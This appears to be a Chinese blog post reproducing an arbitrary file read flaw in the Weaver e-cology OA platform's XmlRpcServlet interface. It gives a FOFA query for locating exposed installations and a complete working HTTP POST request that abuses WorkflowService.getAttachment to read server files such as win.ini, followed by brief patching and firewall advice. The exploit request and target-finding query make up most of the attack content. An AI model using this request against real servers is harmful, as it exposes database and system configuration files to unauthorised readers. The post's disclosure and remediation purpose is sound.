泛微e-cology XmlRpcServlet文件读取漏洞复现

漏洞介绍

泛微新一代移动办公平台e-cology不仅组织提供了一体化的协同工作平台,将组织事务逐渐实现全程电子化,改变传统纸质文件、实体签章的方式。泛微OA E-Cology 平台XmRpcServlet接口处存在任意文件读取漏洞,攻击者可通过该漏洞读取系统重要文件 (如数据库配置文件、系统配置文件) 、数据库配置文件等等,导致网站处于极度不安全状态。

FOFA

app="泛微-OA(e-cology)"

漏洞复现

读取win.ini文件

http 复制代码
POST /weaver/org.apache.xmlrpc.webserver.XmlRpcServlet HTTP/1.1
Host: 
User-Agent: Mozilla/5.0 (Macintosh; Intel Mac OS X 10_14_3) AppleWebKit/605.1.15 (KHTML, like Gecko) Version/12.0.3 Safari/605.1.15
Content-Type: application/xml
Accept-Encoding: gzip
Content-Length: 218
Connection: keep-alive

<?xml version="1.0" encoding="UTF-8"?>
<methodCall>
<methodName>WorkflowService.getAttachment</methodName>
<params>
<param>
<value><string>c://windows/win.ini</string></value>
</param>
</params>
</methodCall>

对返回的密文进行解码

修复建议

官方已修复该漏洞,请用户联系商修复漏洞: https://www.weaver.com.cn/cs/securityDownload.htm

通过防火墙等安全设备设置访问策略,设置白名单访问。

如非必要,禁止公网访问该系统.

相关推荐
网安蟹佬霸10 小时前
2026网络安全每日学习计划:每天学多久?学什么?怎么安排?照着做就行!
网络·学习·安全·web安全·学习路线·网安
递归尽头是星辰16 小时前
微服务安全体系:身份认证、授权与访问控制
web安全·安全架构·访问控制·微服务安全·服务身份认证
网安小学生(兼顾数据库版)17 小时前
CRA漏洞通报义务倒计时:9.11生效要求深度解读
网络·安全·web安全
奔跑的卡卡17 小时前
不只校验单个接口:基于接口调用图谱的全链路请求合法性校验方案
前端·web安全
Neighbor_OldY18 小时前
【实战复盘】RDP暴力破解与内网横向移动溯源:Windows全套排查命令与事件ID硬核解析
运维·windows·web安全
芯盾时代1 天前
《金融业网络安全管理办法(征求意见稿)》全条款深度拆解(二)
安全·web安全·网络安全
蒲公英eric2 天前
从客户端到服务端:DVWA DOM 型 XSS 模块完整漏洞分析教程
前端·web安全·ai·xss·dvwa·ai安全
IT大白鼠2 天前
MSF二次开发与自定义模块编写
网络·安全·web安全·msf
其实防守也摸鱼3 天前
智能体推荐:精选 AI Agent 工具与实战指南
运维·开发语言·人工智能·学习·web安全·自动化
Best-Wishes3 天前
好靶场杯第一届-古法 流量包分析
计算机网络·web安全·安全威胁分析